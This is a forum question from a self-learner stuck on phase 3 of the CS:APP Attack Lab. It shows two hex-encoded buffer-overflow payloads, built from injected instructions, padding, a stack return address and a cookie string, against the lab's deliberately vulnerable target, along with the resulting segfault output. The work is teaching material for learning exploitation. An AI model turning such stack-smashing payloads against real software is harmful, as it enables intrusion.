# CSAPP self study attack lab phase 3 doesn't work

Tags: c, system

I am currently reading the book CS:APP. I am working on the labs too which are for self-study. After I got stuck at phase 3. I tried two methods basically to solve this phase. One of them results in a seg fault. The other doesn't even read the address of my cookie.Here is the assembly for get buff. I have 0x28 padding
[image: Here is the assembly for get buff. I have 0x28 padding].

My %rsp from phase 2 is 0x5561f8c0. The first way I tried to solve it was like the following:
48 c7 c7 d0 f8 61 55 c3  /* mov %rsp + 0x10, rdi --->movq $0x5561f8d0, %rdi  ret */
00 00 00 00 00 00 00 00  /* padding to complete 0x28 */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00

98 f8 61 55 00 00 00 00   /* rsp -0x28 padding */

fe 18 40 00 00 00 00 00  /* address of touch 3 */
32 33 32 61 64 64 31 62  /* my cookies in hexa */

This gets the valid solution but result in seg fault. See the next picture:

Valid solution for level 3 with target ctarget
Ouch!: You caused a segmentation fault!
Better luck next time

I tried another way where I push the address of touch3 before the padding but it doesn't even read my 48 c7 c7 d0 f0 61 55 /* mov %rsp + 0x10, rdi --->movq $0x5561f8d0, %rdi   */
68 fe 18 40 00  /* pushq address of touch 3*/
c3  /* ret */
00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
98 f8 61 55 00 00 00 00 /* rsp -0x28 padding */
32 33 32 61 64 64 31 62  * my cookies in hexa */

You called touch3("��aU")

I don't know why the segmentation fault is happening while it validates, any help will be appreciated.

I tried the two ways as I mentioned above.